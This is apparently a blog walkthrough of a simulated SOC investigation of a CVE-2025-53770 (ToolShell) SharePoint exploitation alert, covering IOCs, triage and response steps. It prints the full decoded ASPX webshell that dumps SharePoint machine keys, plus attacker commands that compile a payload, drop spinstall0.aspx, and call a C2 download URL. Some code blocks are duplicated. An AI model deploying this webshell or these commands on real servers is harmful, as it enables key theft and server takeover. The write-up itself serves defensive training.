June 22, 2026
CVE-2025–53770 (ToolShell) — SharePoint RCE Case Investigation | SOC Analysis Walkthrough
A real-world SOC alert investigation on LetsDefend — breaking down the ToolShell zero-day step by step.
Hitesh kumar
4 min read
Introduction
On July 22, 2025, a critical security alert was triggered on a SOC monitoring platform involving one of the most dangerous vulnerabilities of 2025 — CVE-2025–53770, publicly known as "ToolShell." This is a zero-day Remote Code Execution vulnerability affecting on-premises Microsoft SharePoint Server deployments with a CVSS score of 9.8 (Critical).
In this writeup, I will walk through how I investigated this alert on LetsDefend as a Level 1 SOC Analyst, what I found during the investigation, and how I reached my final verdict.
⚠️ This writeup is for educational purposes only. All investigation was performed in a controlled SOC simulation environment on LetsDefend.
What is CVE-2025–53770?
CVE-2025–53770 is a critical unauthenticated Remote Code Execution vulnerability in on-premises Microsoft SharePoint Server. It is an evolution of a previously patched flaw — CVE-2025–49704 — which was originally discovered at Pwn2Own Berlin 2025. The initial patches released during July 2025 Patch Tuesday were incomplete, allowing attackers to bypass them using advanced deserialization techniques and ViewState abuse.
The attack is simple but devastating. The attacker sends a crafted POST request to the /layouts/15/ToolPane.aspx endpoint with a spoofed Referer header (/_layouts/SignOut.aspx) to bypass authentication — no credentials required. This results in the upload of a malicious ASPX webshell named spinstall0.aspx that extracts cryptographic secrets from the SharePoint server.
Affected versions:
- SharePoint Server 2016
- SharePoint Server 2019
- SharePoint Server Subscription Edition
Note: SharePoint Online (Microsoft 365) is NOT affected.
Alert Details
When the alert came in, here is what the data looked like:
Two things immediately stood out. First, the Referer header /_layouts/SignOut.aspx — this is the exact authentication bypass signature documented in CVE-2025-53770. Second, the Device Action was Allowed — meaning the payload reached the server without being blocked.
Step 1 — Identifying the Attack Type
The requested endpoint /_layouts/15/ToolPane.aspx, the spoofed Referer header, and the 7699-byte POST body are all documented indicators of CVE-2025-53770 exploitation. This is not an SQL injection, XSS, or LFI attack. This is an unauthenticated Remote Code Execution via unsafe deserialization — which falls under the category of Other in standard web attack classifications.
Step 2 — Traffic Direction Analysis
- Source IP: 107.191.58.76 → Public IP (Internet)
- Destination IP: 172.16.20.17 → Private IP (Internal company network)
Traffic direction: Internet → Company Network
An external threat actor was directly targeting the internal SharePoint server.
Step 3 — Checking if the Attack Was Successful
This is where the investigation got serious. I accessed the endpoint security logs for SharePoint01 and found the following evidence.
Finding 1 — Base64 Encoded Webshell
A Base64 encoded payload was discovered on the compromised host. After decoding it, I found the ToolShell signature webshell — an ASPX script designed to extract SharePoint cryptographic secrets:
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
public void Page_load()
{
var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
}
</script><%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
public void Page_load()
{
var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
}
</script>This script extracts the ValidationKey and DecryptionKey — the cryptographic secrets that protect SharePoint's authentication tokens. With these keys, an attacker can forge authentication tokens and access anything on the server.
Finding 2 — Payload Compiled on Victim Machine
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.csThe attacker used the .NET compiler (csc.exe) already present on the Windows server to compile a custom malicious executable directly on the victim machine. This confirms the attacker had full code execution on SharePoint01.
Finding 3 — Persistent Webshell Dropped
"C:\Windows\System32\cmd.exe" /c echo ... > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx"C:\Windows\System32\cmd.exe" /c echo ... > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspxThe attacker wrote spinstall0.aspx to the SharePoint LAYOUTS directory — the exact IOC (Indicator of Compromise) documented for CVE-2025-53770. This establishes persistence on the server.
Finding 4 — C2 Callback Confirmed
powershell.exe -Command "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"powershell.exe -Command "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"Network activity showed the compromised server reaching back to http://107.191.58.76/payload.exe — the same IP as the attacker — confirming active Command and Control communication for further payload delivery.
Step 4 — Artifacts Logged
ValueTypeComment107.191.58.76IP AddressAttacker source IP/_layouts/15/ToolPane.aspxURLExploited endpointspinstall0.aspxOtherDropped webshell — signature IOCC:\Windows\Temp\payload.exeOtherMalicious executable compiled on victimhttp://107.191.58.76/payload.exeURLC2 callback URL
Final Verdict
True Positive — Attack Successful 🔴
All four stages of the attack were confirmed — authentication bypass, webshell deployment, payload execution, and C2 communication. The attacker achieved full Remote Code Execution on an internal SharePoint server with no credentials.
Actions Taken
- Alert escalated to Tier 2 for advanced incident response
- Compromised host SharePoint01 isolated from the network
- Source IP 107.191.58.76 flagged for firewall block
- SharePoint MachineKeys rotation recommended
- Microsoft's official CVE-2025–53770 security patch application recommended
Key Takeaways
1. Always decode Base64 artifacts — the real payload is always hidden inside. Decoding it revealed the exact webshell and confirmed the attack type.
2. Referer header spoofing is a real attack technique — a single crafted HTTP header was enough to bypass SharePoint authentication entirely.
3. spinstall0.aspx = ToolShell signature IOC — if you ever see this filename in a SharePoint LAYOUTS directory, treat it as confirmed compromise immediately.
4. C2 callbacks confirm successful exploitation — outbound connections back to the attacker IP are the clearest sign that a system is fully compromised.
5. Device Action: Allowed does not mean safe — the firewall let this through. Detection and response at the endpoint level saved the day.